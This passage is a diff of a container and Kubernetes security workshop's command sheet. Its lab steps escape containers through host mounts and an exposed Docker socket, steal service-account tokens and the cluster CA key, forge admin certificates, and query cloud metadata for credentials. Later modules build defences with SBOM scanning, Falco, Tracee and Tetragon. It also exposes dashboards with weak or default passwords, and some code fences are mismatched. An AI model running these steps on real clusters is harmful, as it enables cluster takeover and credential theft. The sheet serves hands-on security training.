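echo "$BODY" | base64 -d | openssl enc -d -aes-256-cbc -md sha512 -pbkdf2 -salt -a -pass "pass:${PW}" | gunzip
```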
+
+### Slide 56 - Observing Docker
+
+```
+docker ps
+```
+Note the name or id of the running container and use it in the command below
+```
+docker stop demo
+```
+
+```
+docker events
+```
+
+>Alternative to docker events command:
+>```
+>sudo ctr --address /var/run/containerd/containerd.sock events
+>```
+
+### Slide 58 - Working with external data / using Docker in your offensive toolkit
+
+```
+docker run --rm -it instrumentisto/nmap -A -T4 scanme.nmap.org
+```
+
+Where's the output? (optional)
+```
+mkdir ~/vol_test && cd ~/vol_test/
+```
+```
+docker run -v ~/vol_test:/output instrumentisto/nmap -sT -oA /output/test scanme.nmap.org
+```
+```
+ls -l ~/vol_test
+```
+```
+cat test.nmap
+```
+
+### Slide 60 - Docker with root or etc mounted as volume
+
+```
+docker run -it -v /:/host alpine /bin/ash
+```
+```
+cat /host/etc/shadow
+```
+```
+exit
+```
+
+### Slide 61 - Docker running privileged containers
+
+```
+docker run -it --privileged ubuntu /bin/bash
+```
+```
+apt update && apt-get install -y libcap2-bin
+```
+```
+capsh --print
+```
+```
+grep Cap /proc/self/status
+```
+```
+capsh --decode=0000003fffffffff
+```
+```
+exit
+```
+
+### Slide 62 - Exercise: Exposed Docker socket hijinx
+
+```
+docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu /bin/dash
+```
+
+```
+cd var/run/ && ls -l
+```
+
+```
+apt update && apt install -y curl socat
+```
+
+```
+echo '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/etc/","Target":"/host_etc"}]}' > container.json
+```
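Before POSTing, it's worth confirming the spec parses as valid JSON. A quick check using Python's stdlib pretty-printer (an assumption: `python3` may not be present in the bare ubuntu container, in which case `apt install -y python3` first):

```
# pretty-print the spec; a parse error here means a typo in the JSON
echo '{"Image":"ubuntu","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/etc/","Target":"/host_etc"}]}' > container.json
python3 -m json.tool container.json
```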
+
+```
+curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d "$(cat container.json)" http://localhost/containers/create
+```
+Make note of the first 4-5 characters of the ID returned, you'll need it in the next command.
+```
+curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<container_id>/start
+```
+
+### Slide 63 - Exposed docker socket hijinx (cont.)
+
+```
+socat - UNIX-CONNECT:/var/run/docker.sock
+```
+Make sure you do this carefully and be sure to put the container id in the POST url
+```
+POST /containers/<container_id>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+Host:
+Connection: Upgrade
+Upgrade: tcp
+
+
+```
+After hitting enter twice, the socket should return an http status indicating the connection was upgraded.
+```
+ls
+```
+```
+cat /host_etc/shadow
+```
+
+### Slide 64 - Docker persistence
+
+```
+docker run -d --restart always nginx
+```
+
+
+## Module 4 - Container IR - GL,HF.
+
+### Slide 68 - Image CTF
+```
+docker image pull digitalshokunin/webserver
+```
+
+### Slide 75 - Clean ups
+
+```
+docker system df
+```
+
+```
+docker system prune
+```
+
+```
+docker container prune
+```
+
+## Module 5 - Kubernetes 101
+
+> No commands for this section
+
+## Module 6 - The Basics of using K8S
+
+### Slide 96 - Try out kubectl
+
+```
+kubectl get nodes
+```
+
+### Slide 97 - Namespaces
+
+```
+kubectl get namespaces
+```
+
+### Slide 98 - Creating a namespace
+
+```
+kubectl create namespace lab-namespace
+```
+
+```
+kubectl get namespaces
+```
+
+### Slide 101 - Accessing a cluster
+
+```
+kubectl cluster-info
+```
+
+### Slide 103 - Display pods
+
+```
+kubectl get pods
+```
+
+Specify namespace
+```
+kubectl get pods -n kube-system
+```
+
+All namespaces
+```
+kubectl get pods --all-namespaces
+```
+
+Describe (get more details) on a pod
+```
+kubectl -n kube-system describe pod <pod_name>
+```
+
+### Slide 105 - Babby's first pod
+
+```
+wget https://k8s.io/examples/pods/simple-pod.yaml
+```
+
+```
+kubectl apply -f simple-pod.yaml --namespace lab-namespace
+```
+
+```
+kubectl get pods
+```
+
+```
+kubectl get pods --namespace lab-namespace
+```
+
+```
+kubectl describe pod nginx --namespace lab-namespace
+```
+
+```
+kubectl get pod nginx --namespace lab-namespace
+```
+
+```
+kubectl get pod nginx -o wide --namespace lab-namespace
+```
+
+## Module 7 - Kubernetes Security
+
+### Slide 120 - Lab Setup
+
+```
+ansible-playbook k8s-ansible-setup.yaml
+```
+
+
+### Slide 123 - Lab Scenario
+
+By now your Ansible playbook should have finished with no errors. If so, great; if not, get a TA's attention.
+
+We need to pretend we've compromised dev credentials to Kubernetes. We'll do this by switching kubectl's context (contexts are commonly used when kubectl users have multiple clusters or accounts):
+```
+kubectl config use-context developer@kind-lab
+```
+
+### Slide 124 - Priv esc - to golden tickets (lab)
+
+What can it do?
+```
+kubectl auth can-i --list
+```
+
+Permissions on dev account seem to be very limited
+```
+kubectl get pods
+```
+There's one pod we seem to have access to...
+
+Let's exec into it. Change the `[rand]` below to match the random string in the pod name from the last command
+```
+kubectl exec -it myapp-[rand] -- /bin/bash
+```
+
+### Slide 125 - Priv esc - to golden tickets (lab cont.)
+
+Install some tools we'll need
+
+**Note:** we can do this because we're running in the container as root, otherwise we'd just pull in these tools some other way
+
+```
+apt update && apt install -y curl
+```
+
+```
+curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
+```
+
+chmod `kubectl` and move it to /usr/local/bin
+
+```
+chmod +x kubectl && mv kubectl /usr/local/bin
+```
+
+Use kubectl to see what we can do from this pod:
+
+```
+kubectl auth can-i --list
+```
+### Slide 126 - Priv esc - Why does this work?
+
+Look at the pod's service account K8S mounts inside the container
+
+```
+ls -l /var/run/secrets/kubernetes.io/serviceaccount/
+```
+
+### Slide 127 - Priv esc - to golden tickets (lab cont.)
+
+Get secrets
+
+```
+kubectl get secrets
+```
+
+Not much there. Let's see if we can see secrets outside our namespace:
+
+```
+kubectl get secrets --all-namespaces
+```
+
+One of these looks interesting...
+
+```
+kubectl get secrets -n tracee-system | grep security
+```
+
+Let's try and get the service account token stored in this secret
+```
+kubectl -n tracee-system get secret security-svc-token -o json
+```
+
+For this command we used `-o json`, so the output is detailed JSON, which in some cases makes it easier to parse
+
+### Slide 129 - Priv esc - to golden tickets (lab cont.)
+
+We need to get the token in a form we can use
+
+```
+export TOKEN=$(kubectl -n tracee-system get secret security-svc-token -o=jsonpath="{.data.token}" | base64 -d)
+```
+**Note:** The above command parses the token field out of the JSON and decodes the base64
+
+```
+echo $TOKEN
+```
+**Note:** It starts with eyJ, which is the giveaway that it's a JSON Web Token: eyJ is how the opening of a JSON document looks in base64. A JWT is three base64url-encoded segments separated by dots, so to see the JSON you decode one segment at a time, e.g. `echo $TOKEN | cut -d. -f2 | base64 -d` for the payload (you may need to append `=` padding).
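Here's a small self-contained sketch decoding the payload of a made-up sample token (not a real credential); on your box, point it at `$TOKEN` instead:

```
# sample token with payload {"sub":"demo"} -- purely illustrative
JWT="eyJhbGciOiJub25lIn0.eyJzdWIiOiJkZW1vIn0."
PAYLOAD=$(echo "$JWT" | cut -d. -f2)
# JWTs strip base64 padding; restore it so base64 -d accepts the input
while [ $(( ${#PAYLOAD} % 4 )) -ne 0 ]; do PAYLOAD="${PAYLOAD}="; done
echo "$PAYLOAD" | base64 -d; echo
```

The same trick with `cut -d. -f1` shows the header segment.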
+
+```
+kubectl auth can-i --list
+```
+
+### Slide 130 - Priv esc to golden tickets (lab cont.)
+
+Let's try to use the token this time
+```
+kubectl auth can-i --list --token="$TOKEN"
+```
+
+This time `kubectl` used our stolen token, so now we're authenticating as the other service account with all the privileges. We'll have to make sure to include the TOKEN in future commands to keep using this account.
+
+The big thing you should notice in the command output is a `*` under resources on the same line as a `*` under verbs.
+Since you can do every verb on every resource, this is kind of like root/domain admin for Kubernetes.
+
+Let's find the API server pod; it'll be running in the kube-system namespace.
+
+```
+kubectl get pods -n kube-system --token="$TOKEN"
+```
+
+We're looking for the pod with "kube-apiserver-" in the name.
+
+Great let's steal the PKI private key off the api server pod and take over the cluster
+```
+kubectl --token="$TOKEN" -n kube-system exec kube-apiserver-lab-control-plane -- cat /etc/kubernetes/pki/ca.key
+```
+
+### Slide 132 - Priv esc to golden tickets (lab cont.)
+
+That last command doesn't work anymore, let's try something else...
+
+Let's 'debug' the control plane using a debug pod
+
+```
+kubectl debug node/lab-control-plane -it --image=ubuntu --token=$TOKEN
+```
+
+You now have a session in this special debug pod. It nicely mounts the host filesystem for us so you can "debug" it:
+```
+cd /host
+```
+
+Now we can go after that CA private key for the PKI
+```
+cat etc/kubernetes/pki/ca.key
+```
+
+Copy and paste this to notepad or something for later
+
+Might as well grab the PKI CA cert too; even though it's already public, having it on hand is convenient.
+```
+cat etc/kubernetes/pki/ca.crt
+```
+
+Copy and paste this too
+
+
+### Slide 134 - CA keys - golden tickets (kill shot)
+
+Do this twice to back out of both shell instances (the debug pod and the pod you exec'ed into as the developer account)
+```
+exit
+```
+
+Create a directory we can work with the certs in
+```
+mkdir ~/certs && cd ~/certs
+```
+
+Paste this line
+```
+cat << -EOF- > ca.key
+```
+Paste the contents of the CA private key (ca.key) we grabbed earlier (the one starting with `-----BEGIN RSA PRIVATE KEY-----`)
+
+Paste the -EOF- string to signal to cat we're done
+```
+-EOF-
+```
+
+Normally cat reads files, but a here-document like this is an easy way to paste contents into a file; here it is written to `ca.key`, the same name it had where we found it.
+
+**Note:** The -EOF- is a delimiter string that tells the shell we're done inputting. It can be any string; the convention is to use `EOF`, and we only added dashes on either side on the off chance the characters `EOF` appear somewhere in the key.
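A minimal stand-alone demo of the same here-document pattern:

```
# write two lines into a file using a custom -EOF- delimiter
cat << -EOF- > /tmp/heredoc-demo.txt
first line
second line
-EOF-
cat /tmp/heredoc-demo.txt
```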
+
+Do the same thing again with the CA public certificate, but to `ca.crt` file.
+
+```
+cat << -EOF- > ca.crt
+```
+
+Paste the contents of ca.crt (the one starting with -----BEGIN CERTIFICATE-----)
+
+Paste or type (carefully) the -EOF- string.
+```
+-EOF-
+```
+
+Check that both files were written successfully
+```
+cat ca.key ca.crt
+```
+
+You should see the private key first, bracketed by the `BEGIN RSA PRIVATE KEY` and `END RSA PRIVATE KEY` lines, followed by the certificate bracketed by the `BEGIN CERTIFICATE` and `END CERTIFICATE` lines, each with all five dashes on both ends.
+
+Abridged Example:
+
+```
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpQIBAAKCAQEAvolMNLYvhQHr0xq+bJg/dpwzqF4QkW+4fF0+o5W0I/3sO/6Q
+XZTw6dQgdNbr7kXUqICsM+sKupU5swWBVzVgz6CXroxBVgthfQwzUWkxJv5GWSJj
+C2vlv/7uaxlUbTSCTVzBpzbbucz0kMyBth+lo8FT/1Mv/9hEjPWOhBHpHT2OPnc3
+qeBCE+qM3Ams0WyuYInUHZ9J2F9uh26mjjkU6fGboEcY0wYjmVO6gzslQazuyDdQ
+hWXNg7tEhiz/1iNuNS09vS6nuvXqkKZZvOWgr4KB93vJt4mvvn+Zfcbm+SR6OzYq
+aRjDGK32iyLrzHpYWU+z52gjczSj/1RpWU7K7EP64HtpaXqG5jktsNNw+B6lmWt5
+a88i2x+U+JMsaKhBKWakYFhDMTWBzD/GSYat06Ko+Mx2ySyPhZr77fvqJ5dyBa5c
++u9ikA8fk2IDOZgA74ocORHr1r4deIsz8G3cU6x9Z/7AT+ay6fhVt0E=
+-----END RSA PRIVATE KEY-----
+-----BEGIN CERTIFICATE-----
+MIIBpzCCAU2gAwIBAgIBADAKBggqhkjOPQQDAjA7MRwwGgYDVQQKExNkeW5hbWlj
+bGlzdGVuZXItb3JnMRswGQYDVQQDExJkeW5hbWljbGlzdGVuZXItY2EwHhcNMjIw
+NDIwMjAzNzQ5WhcNMzIwNDE3MjAzNzQ5WjA7MRwwGgYDVQQKExNkeW5hbWljbGlz
+dGVuZXItb3JnMRswGQYDVQQDExJkeW5hbWljbGlzdGVuZXItY2EwWTATBgcqhkjO
+PQIBBggqhkjOPQMBBwNCAASOdvgi0R6lXNcCZAQcF1GNSEaEookyiMe8/hI8vmQD
+MzBQMgSvo4e0L1HAuOoiI3U4lY89d+o5ms5inXxZgAKko0IwQDAOBgNVHQ8BAf8E
+HVSrrIEwCgYIKoZIzj0EAwIDSAAwRQIhAPZDT7THv4l3+icQ4o9Wb4m6+2x5KCae
+aqxwiPwccDGGAiA1PMao7JoSfYr27NL3QKbGo3NLtv0G5fZpLccJ/cq3qw==
+-----END CERTIFICATE-----
+```
+
+### Slide 135 - CA keys - golden tickets (kill shot)
+
+
+Now we need to generate a private key for our "user" we're going to impersonate
+```
+openssl genrsa -out user.key 2048
+```
+
+Create a CSR (Certificate Signing Request). In the subject field, we specify the username as the CN (Common Name) and the group as the O (Organization).
+```
+openssl req -new -key user.key -subj "/CN=kubernetes-admin/O=system:masters" -out user.csr
+```
+
+Normally you'd send the CSR to your Certificate Authority, which signs it with its private key; anyone can then verify that signature with the CA's public cert. But we have the CA's private key and a copy of its public cert, so now we effectively are the CA and can sign this CSR as the Kubernetes CA ourselves.
+```
+openssl x509 -req -in user.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out user.crt -days 1024 -sha256
+```
+
+The signed cert is output to user.crt
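+
+If you'd like to rehearse this whole signing flow without the stolen CA material, here's a self-contained sketch with throwaway keys (all names, paths, and validity periods here are arbitrary):
+```
+mkdir -p /tmp/certs-demo && cd /tmp/certs-demo
+# Stand-in for the cluster CA:
+openssl req -x509 -newkey rsa:2048 -nodes -keyout ca.key -out ca.crt -subj "/CN=demo-ca" -days 30
+# Forged client key and CSR, same subject trick as above:
+openssl genrsa -out user.key 2048
+openssl req -new -key user.key -subj "/CN=kubernetes-admin/O=system:masters" -out user.csr
+# Sign the CSR as the CA:
+openssl x509 -req -in user.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out user.crt -days 30 -sha256
+# Confirm the chain; should print "user.crt: OK":
+openssl verify -CAfile ca.crt user.crt
+```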
+
+We can now import the cert into our .kube/config file for use by `kubectl`
+```
+kubectl config set-credentials kubernetes-admin --client-certificate=user.crt --client-key=user.key --embed-certs
+```
+Now we'll create a context that uses the new credentials along with the existing cluster settings
+```
+kubectl config set-context k8s-admin@hacked-cluster --user=kubernetes-admin --cluster kind-lab
+```
+
+Finally, we'll switch `kubectl` to use the new context.
+
+```
+kubectl config use-context k8s-admin@hacked-cluster
+```
+
+Test out your access. You're still admin, but now it's via the same cluster-admin account you were using before switching to the developer account, just with a second, forged certificate.
+```
+kubectl auth can-i --list
+```
+
+You can keep using this newly signed client certificate, since it's for the same user.
+
+### Slide 139 - Evil Pod (lab)
+
+Let's go back to the original scenario, but this time pretend the pod and special service account never existed.
+```
+kubectl delete deployment myapp -n pls-dont-hack-me
+```
+
+```
+kubectl delete serviceaccount read-secrets -n pls-dont-hack-me
+```
+
+**Note:** Notice you did that as the kubernetes-admin account, but via the context using your forged certificate
+
+Now let's go back to pretending we've compromised the developer's credentials and switch to using them.
+
+```
+kubectl config use-context developer@kind-lab
+```
+Let's go back to the home directory
+```
+cd ~
+```
+
+You now no longer have a priv esc to exploit, but there's often another trick.
+
+Let's take a look at a special pod manifest
+```
+cat k8s-manifests/evilpod.yaml
+```
+
+Note the nodeName and volume mounts.
+
+### Slide 141 - Evil Pod (Lab Cont.)
+
+Let's create this pod and deploy it on the controlplane node.
+```
+kubectl apply -f k8s-manifests/evilpod.yaml
+```
+**Note:** You could also run `create` instead of `apply`, but `apply` will create the pod if it doesn't exist, or update its specification to match the manifest (restarting it) if it does.
+
+Now that the pod's running, we can run a simple command to steal the key from the host volume mounted inside of it.
+```
+kubectl exec -it -n pls-dont-hack-me evil-pod -- cat /controlplane/etc/kubernetes/pki/ca.key
+```
+
+A much more straightforward way of getting to the control plane as the developer, and one that often works in Kubernetes clusters without admission controller checks.
+
+### Slide 145 - Cleanup
+
+Switch back to original account/context
+```
+kubectl config use-context kind-lab
+```
+
+Verify your admin rights are back (look for * on resources and verbs)
+```
+kubectl auth can-i --list
+```
+
+Optionally, apply these manifests to put back the service account and pod used in the priv esc lab, in case you want to run it again later.
+
+```
+kubectl apply -f k8s-manifests/serviceaccounts.yaml
+```
+
+```
+kubectl apply -f k8s-manifests/pods.yaml
+```
+
+You can run this to delete the evilpod since you're done with it.
+```
+kubectl delete -f k8s-manifests/evilpod.yaml
+```
+
+### Slide 151 - Ex: Cloud Metadata attacks
+
+Execute a pod in our lab with heavily restricted permissions.
+
+```
+kubectl apply -f k8s-manifests/nothingallowedpod.yaml --namespace lab-namespace
+```
+
+Start a shell in our restricted pod
+
+```
+kubectl exec -it nothing-allowed-exec-pod -n lab-namespace -- bash
+```
+
+```
+curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/'
+```
+
+```
+curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/id' -w "\n"
+```
+
+```
+curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+```
+
+```
+curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
+```
+
+### Slide 155 - Play with Prometheus/Grafana
+
+```
+export WORKER1=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' lab-worker)
+```
+
+Create a tunnel for Grafana:
+```
+ngrok http $WORKER1:31000 --oauth=google --oauth-allow-email=@gmail.com
+```
+
+Open the ngrok provided URL
+
+Click through the warning message, login with your Google Account matching the email you provided in the ngrok command
+
+You now have access to your Grafana Dashboard from the internet
+
+>Note: If you're having issues using Google for OAuth, you can fall back to basic auth and specify your own user/password.
+```
+#Example of basic auth
+ngrok http $WORKER1:31000 --basic-auth="user:password123"
+```
+
+Grafana Credentials
+
+Username:
+```
+admin
+```
+Password:
+```
+prom-operator
+```
+
+Commands for other services (if you want to explore later outside of workshop):
+
+Prometheus Tunnel:
+```
+ngrok http $WORKER1:30000 --oauth=google --oauth-allow-email=@gmail.com
+```
+
+AlertManager:
+```
+ngrok http $WORKER1:32000 --oauth=google --oauth-allow-email=@gmail.com
+```
+
+
+### Slide 157 - Tracee events in Grafana
+
+Navigate:
+Top right Hamburger menu → Explore
+
+
+
+Switch Prometheus in the top left to Loki
+
+
+
+On the left side you'll see an option for Builder or Code, select Code.
+
+
+
+Paste this query into the query bar and click Run Query
+```
+{namespace="tracee-system"} |= `matchedPolicies` != `sshd` | json | line_format "{{.log}}"
+```
+Narrow down results to your own activity.
+```
+{namespace="tracee-system"} |= `matchedPolicies` != `sshd` | json | line_format "{{.log}}" | hostName !~ `juice-shop-.*`
+```
+
+
+**Adding the Dashboard**
+
+Under the top-left hamburger menu → Dashboards
+
+Select New → Import
+
+In another tab, open the link below and copy the json from there
+
+```
+https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/grafana/tracee-dashboard.json
+```
+
+Paste the json in the text box labeled 'Import via panel json'
+
+Click the `[Load]` button
+
+## Module 8 - Supply Chain Security
+
+This module covers how attackers compromise the container supply chain and how defenders can detect and prevent it using modern tooling.
+
+### Exercise: Image Inspection with crane
+
+`crane` is a tool for interacting with container registries and image layers — a modern replacement for tools like `whaler`.
+
+Pull and inspect an image's manifest:
+```
+crane manifest ubuntu:22.04 | jq
+```
+
+List the available tags in a repository (`crane ls` lists tags, not layers):
+```
+crane ls ubuntu
+```
+
+Note: Tags like `:latest` are mutable. An attacker can push a new image to the same tag. Let's see the digest (immutable reference):
+```
+crane digest ubuntu:22.04
+```
+
+Export an image's flattened filesystem to inspect it locally:
+```
+mkdir /tmp/crane-export && crane export ubuntu:22.04 /tmp/crane-export/ubuntu.tar
+```
+
+```
+tar -tf /tmp/crane-export/ubuntu.tar | head -30
+```
+
+Compare this to our earlier `docker save` + `tar` approach — `crane` doesn't require Docker daemon access.
+
+### Exercise: SBOM Generation with syft
+
+Generate a Software Bill of Materials (SBOM) for an image:
+```
+syft ubuntu:22.04
+```
+
+Output in SPDX format (industry standard):
+```
+syft ubuntu:22.04 -o spdx-json > /tmp/ubuntu-sbom.json
+```
+
+Now generate an SBOM for our juice-shop image (a more interesting target):
+```
+syft bkimminich/juice-shop -o cyclonedx-json > /tmp/juiceshop-sbom.json
+```
+
+```
+cat /tmp/juiceshop-sbom.json | jq '.components | length'
+```
+
+Note the number of dependencies — each one is a potential attack surface.
+
+### Exercise: Vulnerability Scanning with grype
+
+Scan an image for known CVEs:
+```
+grype ubuntu:22.04
+```
+
+Scan using a pre-generated SBOM:
+```
+grype sbom:/tmp/juiceshop-sbom.json
+```
+
+Show only vulnerabilities with available fixes, and fail (non-zero exit code) if any critical ones are found:
+```
+grype bkimminich/juice-shop --only-fixed --fail-on critical
+```
+
+The `--fail-on` flag is useful in CI/CD pipelines to gate deployments.
+
+### Exercise: Image Signing with cosign (Sigstore)
+
+Generate a key pair for signing:
+```
+cosign generate-key-pair
+```
+
+This creates `cosign.key` (private) and `cosign.pub` (public).
+
+**Note:** To actually sign and push, you'd need a writable registry. For demo purposes, let's verify signatures on public images instead (the first attempt below is expected to fail):
+
+```
+cosign verify --key https://registry.npmjs.org/-/npm/v1/keys alpine:latest 2>&1 || echo "Not signed with this key (expected)"
+```
+
+Verify a known-signed image (distroless is signed by Google):
+```
+cosign verify gcr.io/distroless/static:latest --certificate-identity-regexp='.*' --certificate-oidc-issuer-regexp='.*' 2>&1 | head -20
+```
+
+### Exercise: Malicious Image Pipeline
+
+Let's combine `crane`, `syft`, and `grype` to analyze the `mkefi/dropboxservice` image we looked at earlier:
+
+```
+crane manifest mkefi/dropboxservice | jq '.layers | length'
+```
+
+```
+syft mkefi/dropboxservice -o table
+```
+
+```
+grype mkefi/dropboxservice
+```
+
+What vulnerabilities exist? How old are the base image packages? This is the kind of pipeline you'd run in CI/CD or as part of an image admission policy.
+
+### Exercise: Tag Mutability Attack
+
+Demonstrate why pinning by tag is not the same as pinning by digest:
+
+```
+crane digest ubuntu:22.04
+```
+
+Note this digest. Now imagine an attacker with write access to the registry pushes a trojanized image to the same `:22.04` tag. The digest would change, but any Dockerfile or manifest referencing `ubuntu:22.04` would pull the new (malicious) image.
+
+The fix: pin by digest in production:
+```
+# Instead of:
+# image: ubuntu:22.04
+# Use:
+# image: ubuntu@sha256:
+```
+
+---
+
+## Module 9 - Modern Runtime Security
+
+This module deploys and compares three eBPF-based runtime security tools: Tracee, Falco, and Tetragon.
+
+### Exercise: Tracee (Updated)
+
+Tracee should already be running in the cluster from the ansible setup. Let's verify:
+
+```
+kubectl get pods -n tracee-system
+```
+
+Run the Tracee tester to generate known-detectable events:
+```
+kubectl apply -f k8s-manifests/pods.yaml
+```
+
+```
+kubectl logs -n tracee-system -l app.kubernetes.io/name=tracee --tail=50 | grep matchedPolicies
+```
+
+You can also run Tracee standalone in Docker for host-level monitoring:
+```
+docker run --name tracee -d --rm --pid=host --cgroupns=host --privileged \
+ -v /etc/os-release:/etc/os-release-host:ro \
+ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \
+ aquasec/tracee:latest
+```
+
+```
+docker logs tracee --follow 2>&1 | grep MatchedPolicies
+```
+
+### Exercise: Falco
+
+Falco should already be running from the ansible setup. Let's verify:
+
+```
+kubectl get pods -n falco-system
+```
+
+Check Falco logs for any alerts it's already generated:
+```
+kubectl logs -n falco-system -l app.kubernetes.io/name=falco --tail=30
+```
+
+Now let's trigger some Falco rules. Launch a privileged container:
+```
+docker run -it --privileged --rm ubuntu:22.04 /bin/bash -c "cat /etc/shadow; exit"
+```
+
+Check Falco logs again — you should see alerts for reading sensitive files:
+```
+kubectl logs -n falco-system -l app.kubernetes.io/name=falco --tail=10
+```
+
+#### Custom Falco Rules for Container Escape Detection
+
+Create a custom Falco rules file:
+```
+cat << 'EOF' > /tmp/custom-falco-rules.yaml
+customRules:
+ custom-rules.yaml: |-
+ - rule: Container Escape via Mount
+ desc: Detect attempts to mount host filesystem from within a container
+ condition: >
+ spawned_process and container and
+ proc.name in (mount, umount) and
+ not proc.pname in (dockerd, containerd)
+ output: >
+ Container escape attempt via mount
+ (user=%user.name command=%proc.cmdline container=%container.name
+ image=%container.image.repository)
+ priority: CRITICAL
+ tags: [container, escape]
+
+ - rule: Suspicious kubectl in Container
+ desc: Detect kubectl execution inside a container
+ condition: >
+ spawned_process and container and
+ proc.name = kubectl
+ output: >
+ kubectl executed inside container
+ (user=%user.name command=%proc.cmdline container=%container.name
+ image=%container.image.repository)
+ priority: WARNING
+ tags: [container, lateral_movement]
+EOF
+```
+
+Upgrade Falco with custom rules:
+```
+helm upgrade falco falcosecurity/falco \
+ --namespace falco-system \
+ --reuse-values \
+ --values /tmp/custom-falco-rules.yaml
+```
+
+#### Falcosidekick Web UI
+
+Falcosidekick provides a web UI for viewing alerts. Let's access it with a port-forward:
+```
+kubectl port-forward svc/falco-falcosidekick-ui -n falco-system 2802:2802 &
+```
+
+Then expose the forwarded local port via ngrok:
+```
+ngrok http 2802 --basic-auth="admin:password123"
+```
+```
+
+### Exercise: Tetragon
+
+Tetragon should already be running. Verify:
+
+```
+kubectl get pods -n tetragon
+```
+
+Check Tetragon events:
+```
+kubectl logs -n tetragon -l app.kubernetes.io/name=tetragon -c export-stdout --tail=20
+```
+
+#### TracingPolicy CRDs
+
+Tetragon uses TracingPolicy CRDs for custom security policies. Create one to monitor file access:
+
+```
+cat << 'EOF' | kubectl apply -f -
+apiVersion: cilium.io/v1alpha1
+kind: TracingPolicy
+metadata:
+ name: monitor-sensitive-files
+spec:
+ kprobes:
+ - call: "security_file_open"
+ syscall: false
+ args:
+ - index: 0
+ type: "file"
+ selectors:
+ - matchArgs:
+ - index: 0
+ operator: "Prefix"
+ values:
+ - "/etc/shadow"
+ - "/etc/kubernetes/pki"
+ - "/var/run/secrets/kubernetes.io"
+EOF
+```
+
+Now trigger it by reading a sensitive file from a pod:
+```
+kubectl exec -it -n pls-dont-hack-me evil-pod -- cat /controlplane/etc/shadow 2>/dev/null || echo "Pod not running yet"
+```
+
+Check Tetragon logs for the file access event:
+```
+kubectl logs -n tetragon -l app.kubernetes.io/name=tetragon -c export-stdout --tail=10 | jq 'select(.process_kprobe != null)'
+```
+
+#### Create a Network Monitoring Policy
+
+```
+cat << 'EOF' | kubectl apply -f -
+apiVersion: cilium.io/v1alpha1
+kind: TracingPolicy
+metadata:
+ name: monitor-network-connections
+spec:
+ kprobes:
+ - call: "tcp_connect"
+ syscall: false
+ args:
+ - index: 0
+ type: "sock"
+EOF
+```
+
+### Exercise: Comparing Detection Tools
+
+Now let's compare all three tools by running the same attack and seeing what each one detects.
+
+**The Attack:** Execute kubectl inside a compromised pod (simulating lateral movement)
+
+First, make sure you're using the admin context:
+```
+kubectl config use-context kind-lab
+```
+
+Deploy the attack (replace `myapp-` with your full pod name, from `kubectl get pods -n pls-dont-hack-me`):
+```
+kubectl exec -it myapp- -n pls-dont-hack-me -- /bin/bash -c "apt update -qq && apt install -y -qq curl > /dev/null 2>&1 && curl -sLO 'https://dl.k8s.io/release/v1.31.4/bin/linux/amd64/kubectl' && chmod +x kubectl && ./kubectl auth can-i --list"
+```
+
+Now check each tool's output:
+
+**Tracee:**
+```
+kubectl logs -n tracee-system -l app.kubernetes.io/name=tracee --tail=20 | grep -i kubectl
+```
+
+**Falco:**
+```
+kubectl logs -n falco-system -l app.kubernetes.io/name=falco --tail=20 | grep -i kubectl
+```
+
+**Tetragon:**
+```
+kubectl logs -n tetragon -l app.kubernetes.io/name=tetragon -c export-stdout --tail=20 | jq 'select(.process_exec.process.binary | contains("kubectl"))'
+```
+
+| Tool | Strengths | Focus |
+|------|-----------|-------|
+| Tracee | Signature-based detection, built-in rules | Known attack patterns |
+| Falco | Rich rule language, ecosystem (Sidekick) | Runtime policy enforcement |
+| Tetragon | Kernel-level tracing, CRD-based policies | Deep observability, enforcement |
+
+### Viewing Runtime Security in Grafana
+
+Navigate to Grafana (same as before):
+```
+export WORKER1=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' lab-worker)
+ngrok http $WORKER1:31000 --basic-auth="admin:password123"
+```
+
+In Grafana, go to Explore → Loki and use these queries:
+
+**Tracee events:**
+```
+{namespace="tracee-system"} |= `matchedPolicies` != `sshd` | json | line_format "{{.log}}"
+```
+
+**Falco events:**
+```
+{namespace="falco-system"} | json | line_format "{{.log}}"
+```
+
+**Tetragon events:**
+```
+{namespace="tetragon"} | json | line_format "{{.log}}"
+```
+
+---
+
+## Module 10 - Cloud-Native & Managed K8s Attacks
+
+This module covers attacks specific to cloud-hosted Kubernetes environments.
+
+### Exercise: IMDS Attacks
+
+The Instance Metadata Service (IMDS) is available on cloud VMs and can be queried from within pods to steal cloud credentials.
+
+Deploy the IMDS demo pod:
+```
+kubectl apply -f k8s-manifests/imds-demo-pod.yaml
+```
+
+```
+kubectl exec -it imds-attack-pod -n pls-dont-hack-me -- /bin/sh
+```
+
+**GCP IMDS (v1 - no token required):**
+```
+curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/id -w "\n"
+```
+
+```
+curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+```
+
+```
+curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
+```
+
+**AWS IMDSv1 (deprecated, still often available):**
+```
+curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ -w "\n"
+```
+
+**AWS IMDSv2 (token-based):**
+```
